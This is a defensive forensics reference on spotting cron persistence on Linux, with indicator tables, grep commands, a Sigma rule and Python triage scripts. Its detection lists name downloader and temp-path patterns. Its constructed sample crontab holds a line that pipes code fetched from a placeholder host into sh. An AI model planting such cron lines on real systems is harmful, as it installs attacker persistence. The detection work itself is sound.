This note documents detection patterns related to Cron Persistence on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| /etc/crontab | New scheduled command | System-wide persistence entry | Critical | Primary cron persistence artifact. |
| /etc/cron.d/ | New cron file | Drop-in scheduled persistence | Critical | Common stealth location. |
| /var/spool/cron/ | User cron entry | Per-user persistence | Critical | Often tied to compromised account. |
| Shell history | crontab -e | Interactive cron modification | Critical | Strong operator evidence. |
| Shell history | `echo ... \| crontab` | Inline cron insertion | Critical | |
| Shell history | @reboot | Boot-triggered persistence | Critical | Very high-value persistence signal. |
| Cron entry | curl, wget | Remote payload retrieval | Critical | Strong malicious automation signal. |
| Cron entry | bash, sh, python | Scripted execution | Critical | Common shell persistence pattern. |
| Cron entry | /tmp, /dev/shm | Temp payload execution | Critical | Highly suspicious path. |
| auditd | write to cron files | Process-level persistence evidence | Critical | Best attribution if enabled. |
| File timestamps | recent cron modification | Persistence timing anchor | Critical | Correlates with intrusion window. |
| journalctl | cron daemon execution | Scheduled execution trace | High | Useful when execution already occurred. |
| Syslog | CRON entries | Job execution records | Critical | Confirms active trigger. |
| File ownership anomaly | unexpected cron owner | Ownership inconsistent with the expected account | High | Can reveal attacker mistakes. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Cron added after SSH success | Stabilization after foothold | Critical | Common attacker progression. |
| Cron under dormant account | Hidden persistence | Critical | Often low-visibility tactic. |
| Frequent short interval job | Every minute execution | Critical | Common beacon pattern. |
| Hidden script called by cron | Secondary payload in temp/home | Critical | Common staged persistence. |
| Cron runs downloader repeatedly | Re-fetch resilience | Critical | Operator durability pattern. |
| Root cron modified unexpectedly | Privileged persistence | Critical | High severity. |
| Cron plus key/user creation | Multi-layer persistence | Critical | Strong hostile sequence. |
| Commentless cron drop-in file | Minimalist attacker insertion | High | Often manually dropped. |
| Cron file recent but no admin ticket | Context anomaly | High | Important operational clue. |
| Cron executes deleted file path | Cleanup attempt after persistence | High | Indicates incomplete cleanup. |
Common Tools
| Tool | Usage |
|---|---|
| crontab -e | Interactive cron editing. |
| `echo ... \| crontab` | Inline cron insertion. |
| Direct file edit | /etc/crontab, /etc/cron.d/*. |
| sed -i | Silent cron modification. |
| printf >> | Append persistence line. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| System cron | /etc/crontab | Critical | Main system persistence file. |
| Cron drop-ins | /etc/cron.d/ | Critical | Very common attacker location. |
| User cron | /var/spool/cron/, /var/spool/cron/crontabs/ | Critical | Per-user persistence truth. |
| Periodic jobs | /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly | High | Script placement persistence. |
| Shell history | .bash_history, .zsh_history | Critical | Cron insertion commands. |
| Audit logs | /var/log/audit/audit.log | Critical | File write attribution. |
| Syslog / auth logs | /var/log/syslog, /var/log/cron, /var/log/messages | Critical | Execution evidence. |
| Journald | journalctl | High | Cron execution visibility. |
| Script targets | referenced file paths | Critical | Often actual payload location. |
MITRE ATT&CK References
- T1053 Scheduled Task or Job
- T1053.003 Cron
- T1059 Command and Scripting Interpreter
Decision Tree
- Is cron modified?
  - Enumerate system and user cron sources.
- Which account owns persistence?
  - Determine privilege and account legitimacy.
- What executes?
  - Inspect command, path, interpreter, interval.
- Has cron already executed?
  - Review syslog / journal execution traces.
- Is payload present?
  - Inspect referenced scripts/binaries.
- Pivot
  - Cron owner → login history.
  - Script path → payload analysis.
  - Timestamp → intrusion correlation.
- Confirm persistence
  - Unknown cron + suspicious command + intrusion timeline = malicious persistence.
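The first three steps of the tree (enumerate sources, identify the owning account, inspect command, path, interpreter and interval) can be run as one triage pass over crontab text. The script below is an added example written for this note, not part of the original; it parses system-table lines (which carry a user field) and user-spool lines (which do not), applies the indicator patterns from the grep-string table, and flags every-minute schedules. The cron.d sample it runs on is constructed.

```python
import re

# Indicator patterns taken from this note's "High Value Grep Strings" table.
# Interpreters must follow a slash or whitespace so "update.sh" is not read as "sh".
INDICATORS = {
    "boot_persistence": re.compile(r"@reboot"),
    "remote_retrieval": re.compile(r"\b(?:curl|wget)\b"),
    "interpreter": re.compile(r"(?:^|[\s/])(?:bash|sh|python3?)\b"),
    "temp_path": re.compile(r"(?:/tmp|/dev/shm)(?:/|\b)"),
}

def every_minute(schedule):
    """True for '* * * * *' or '*/1 * * * *': the short-interval beacon pattern."""
    f = schedule.split()
    return len(f) == 5 and f[0] in ("*", "*/1") and all(x == "*" for x in f[1:])

def parse_cron_line(line, system_table):
    """Split a crontab line into (schedule, user, command); None for comments/env lines."""
    tokens = line.strip().split()
    if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
        return None
    n = 1 if tokens[0].startswith("@") else 5  # @reboot-style alias or five fields
    skip = n + (1 if system_table else 0)     # /etc/crontab and cron.d carry a user
    if len(tokens) <= skip:
        return None
    user = tokens[n] if system_table else None
    return " ".join(tokens[:n]), user, " ".join(tokens[skip:])

def triage(source, text, system_table):
    """Return one dict per entry that matches at least one indicator."""
    findings = []
    for line in text.splitlines():
        parsed = parse_cron_line(line, system_table)
        if parsed is None:
            continue
        schedule, user, command = parsed
        hits = [k for k, rx in INDICATORS.items()
                if rx.search(schedule) or rx.search(command)]
        if every_minute(schedule):
            hits.append("every_minute")
        if hits:
            findings.append({"source": source, "schedule": schedule,
                             "user": user, "command": command, "hits": hits})
    return findings

# Constructed sample of a system cron drop-in, not captured from a real host.
SAMPLE_CRON_D = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * www-data /bin/bash -c 'curl -s http://placeholder.invalid/p | sh'
@reboot root /dev/shm/.x/update.sh
"""
```

Running `triage("/etc/cron.d/constructed", SAMPLE_CRON_D, system_table=True)` leaves the run-parts line unflagged and reports the other two with their owning user and matched indicators; for spool files pass `system_table=False`.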
Example Detection Templates
Grep

```bash
grep -R "@reboot\|curl\|wget\|bash\|python\|/tmp\|/dev/shm" /etc/crontab /etc/cron* /var/spool/cron 2>/dev/null
grep -R "crontab" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "echo .*crontab\|crontab -e" /home /root 2>/dev/null
```

Journalctl

```bash
journalctl | grep CRON
```

File Inspection

```bash
find /etc/cron* /var/spool/cron -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort
stat /etc/crontab
```
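`journalctl | grep CRON` answers "has cron already executed?" only line by line. The following added example (written for this note, not part of the original) parses the `CRON[pid]: (user) CMD (...)` records that syslog and journalctl both emit, groups runs per user and command, and flags the every-minute beacon pattern and indicator-matching commands from the indirect-indicator table. The log excerpt is constructed, and syslog timestamps are assumed to fall within one calendar year because they carry no year field.

```python
import re
from collections import defaultdict
from datetime import datetime

# One CRON execution record as written by syslog or shown by journalctl, e.g.
#   Jan  5 10:01:01 web01 CRON[4130]: (www-data) CMD (/bin/bash /dev/shm/.s/run.sh)
CRON_EXEC = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ CRON\[\d+\]: "
    r"\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$"
)
# Command-level indicators from this note's grep strings.
SUSPICIOUS = re.compile(r"@reboot|\b(?:curl|wget)\b|/tmp|/dev/shm")

def parse_cron_executions(lines):
    """Group CMD records by (user, command) with their run timestamps."""
    runs = defaultdict(list)
    for line in lines:
        m = CRON_EXEC.match(line)
        if m:
            # Syslog timestamps carry no year; assumed to fall in one calendar year.
            runs[(m["user"], m["cmd"].strip())].append(
                datetime.strptime(m["ts"], "%b %d %H:%M:%S"))
    return runs

def beacon_candidates(runs, max_gap=60, min_runs=3):
    """Flag jobs that ran at least min_runs times never more than max_gap seconds
    apart (every-minute beacon pattern) or whose command matches an indicator."""
    out = []
    for (user, cmd), stamps in runs.items():
        stamps = sorted(stamps)
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        short = len(stamps) >= min_runs and bool(gaps) and max(gaps) <= max_gap
        flagged = bool(SUSPICIOUS.search(cmd))
        if short or flagged:
            out.append({"user": user, "cmd": cmd, "runs": len(stamps),
                        "every_minute": short, "suspicious_cmd": flagged})
    return out

# Constructed syslog excerpt, not captured from a real host.
SAMPLE_LOG = """\
Jan  5 10:00:01 web01 CRON[4102]: (www-data) CMD (/bin/bash /dev/shm/.s/run.sh)
Jan  5 10:01:01 web01 CRON[4130]: (www-data) CMD (/bin/bash /dev/shm/.s/run.sh)
Jan  5 10:02:01 web01 CRON[4155]: (www-data) CMD (/bin/bash /dev/shm/.s/run.sh)
Jan  5 10:05:01 web01 CRON[4190]: (backup) CMD (/usr/local/bin/backup.sh)
Jan  5 10:17:01 web01 CRON[4250]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
""".splitlines()
```

`beacon_candidates(parse_cron_executions(SAMPLE_LOG))` returns only the www-data job, which both ran every minute and executed from /dev/shm; feed it `journalctl -o short` or /var/log/syslog lines instead of the sample for live triage.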
Sigma
```yaml
title: Linux Cron Persistence
id: linux-cron-persistence
status: experimental
description: Detects suspicious cron persistence entries and scheduled execution indicators
logsource:
  product: linux
detection:
  selection_keywords:
    message|contains:
      - 'CRON'
      - '@reboot'
      - 'curl'
      - 'wget'
  condition: selection_keywords
fields:
  - message
  - hostname
falsepositives:
  - Legitimate scheduled administration
level: high
tags:
  - attack.persistence
  - attack.t1053.003
```
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Cron review | Baseline all cron entries | Critical | Unknown jobs should stand out. |
| File monitoring | Watch cron paths for writes | Critical | Excellent invariant detection. |
| Least privilege | Restrict cron access | High | Reduces persistence options. |
| Auditd | Track writes to cron locations | High | Strong attribution. |
| Temp execution control | Prevent temp payload execution | High | Blocks common cron payloads. |
| Logging | Preserve cron execution logs | High | Needed to confirm runtime behavior. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Any suspicious cron entries? | grep cron files | Immediate persistence check. |
| Which user owns cron? | inspect spool ownership | Actor context. |
| Does cron call temp file? | inspect paths | High-confidence suspicion. |
| Has cron executed? | grep CRON logs | Confirms active trigger. |
| Is payload still present? | inspect target file | Execution target analysis. |
| Was cron added post-login? | correlate timestamps | Intrusion chain. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
| @reboot | Boot persistence. |
| curl | Remote retrieval. |
| wget | Remote retrieval. |
| bash | Shell execution. |
| python | Interpreter execution. |
| /tmp | Temp payload path. |
| /dev/shm | Stealth temp path. |
| crontab -e | Interactive modification. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Every-minute cron + temp shell | Strong beacon persistence. |
| Root cron modified recently | High severity privileged persistence. |
| Cron calls deleted file | Cleanup after persistence insertion likely. |
| User cron under fresh account | Persistence tied to compromise. |
| Cron plus downloader | Resilient payload staging pattern. |
| Multiple cron layers | Operator redundancy. |